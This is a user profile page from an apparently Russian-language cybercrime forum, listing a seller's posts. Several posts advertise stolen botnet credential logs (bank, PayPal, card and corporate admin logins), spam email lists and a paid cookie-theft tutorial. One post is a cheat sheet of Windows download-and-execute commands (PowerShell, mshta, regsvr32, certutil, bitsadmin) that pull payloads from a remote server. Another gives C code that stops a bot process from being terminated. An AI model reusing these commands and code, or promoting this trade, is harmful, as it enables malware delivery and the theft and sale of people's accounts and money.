Перейти к содержанию

Kozyrev

Пользователь
  • Публикаций

    12
  • Зарегистрирован

  • Посещение

Репутация

4 Neutral

Информация о Kozyrev

  • Звание
    Rank №2
  1. Stealing Chrome cookies without a password

    do you still need this tutorial? I can make a private video to put you through. It costs money. PM if still interested
  2. Этот продукт продан. Тема закрыта!
  3. Selling freshly sourced Logs (less than 1 week old). The logs are sourced from my private botnet using 67% malvertising and rest exchange traffic. Logs contain Username and Passowrds with Cookies (Json, TXT) of various accounts to be listed below and others. -RDP Files -OneNote Offline Cache -Filezilla (recentservers.xml, Filezilla.xml, Sitemanager.xml) -Corporate Outlook Email Offline Cache (.pst files) -Credit Cards from Chrome Browsers Autofill (No CVV2) -Amazon -Newegg -US Shopping Sites with available (Macy's, Blommingdale, etc) -Aliexpress (with credit cards) -Ebay (with linked paypal and also seller accounts) -Taboola (with available credit) -Various Banks in Philipines, India, Pakistan, South Africa, Hungary, France, Malaysia, Vietnam, etc) -Chase Bank (US) -Bank of America (US) -Paypal -Blockchain (with Email) -Neteller -Skrill -Payeer -Qiwi -MEW (MyEtherWallet) -Office365 Corporate Logins (with US Corporate Office365 Admin Access) -Corporate Gsuite Accounts -Business Facebook -WHM -Cpanels -Various Social Social Media Accounts (With Email Access) ..........and lots more Jabber: Kozyrev@exploit.im
  4. Yeah i also recommend BlackTDS. You can also setup custom using Ketairo TDS
  5. I can provide Verified Google adsense accounts to buyers on a regular basis. I also have access to the domain name and in some cases the hosting of the site too. PM me for more details Sample Screenshot: https://i.imgur.com/SQBr1y4.jpg
  6. Windows - Download & execute methods

    Just the popular ones. Can be customised further. Powershell 1. From an HTTP server powershell -exec bypass -c "(New-Object Net.WebClient) .Proxy.Credentials = [Net.CredentialCache] :: DefaultNetworkCredentials; iwr ('http: //webserver/payload.ps1') | iex" 2. From a Webdav server powershell -exec bypass -f \\ webdavserver \ folder \ payload.ps1 Cmd cmd.exe / k < \\ webdavserver \ folder \ batchfile.txt Cscript / wscript cscript // E: jscript \\ webdavserver \ folder \ payload.txt Mshta mshta vbscript: Close (Execute ("GetObject (" "script: http: //webserver/payload.sct" ")")) mshta http: //webserver/payload.hta mshta \\ webdavserver \ folder \ payload.hta Rundll32 rundll32 \ \ webdavserver \ folder \ payload.dll, entrypoint rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; o = GetObject ("script: http: //webserver/payload.sct"); window.close (); Regasm / Regsvc regsvr32 / u / n / s /i:http://webserver/payload.sct scrobj.dll regsvr32 / u / n / s /i:\\webdavserver\folder\payload.sct scrobj.dll Odbcconf odbcconf / s / a {regsvr \\ webdavserver \ folder \ payload_dll.txt} Certutil certutil -urlcache -split -f http: //webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C: \ Windows \ Microsoft.NET \ Framework64 \ v4.0.30319 \ InstallUtil / logfile = / LogToConsole = false / u payload.dll certutil -urlcache -split -f http: //webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe Bitsadmin bitsadmin / transfer mydownloadjob / download / priority normal http: // /xyz.exe C: \\ Users \\% USERNAME% \\ AppData \\ local \\ temp \\ xyz.exe
  7. Anti-Terminate Process C | C++

    Возьмите это в качестве еще одного шаблона для обеспечения большей устойчивости вашего бота #define _WIN32_WINNT 0x0500 #include #include #include #include #include #include BOOL ProtectProcess(HANDLE hProcess); void main(void) { HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()); ProtectProcess(hProc); printf("Anti Terminate"); while(TRUE) { Sleep(100); } } BOOL ProtectProcess(HANDLE hProcess) { SECURITY_ATTRIBUTES sa; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.bInheritHandle = FALSE; if (!ConvertStringSecurityDescriptorToSecurityDescriptor("D:P", SDDL_REVISION_1, &(sa.lpSecurityDescriptor), NULL)) return FALSE; if (!SetKernelObjectSecurity(hProcess, DACL_SECURITY_INFORMATION, sa.lpSecurityDescriptor)) return FALSE; return TRUE; }
  8. Got fresh US corporate emails which you can spam. Only selling to one buyer. Drop PM if interested
  9. Склейка с doc

    https://marcoramilli.com/2019/01/30/spreading-csv-malware-over-google-sheets/
×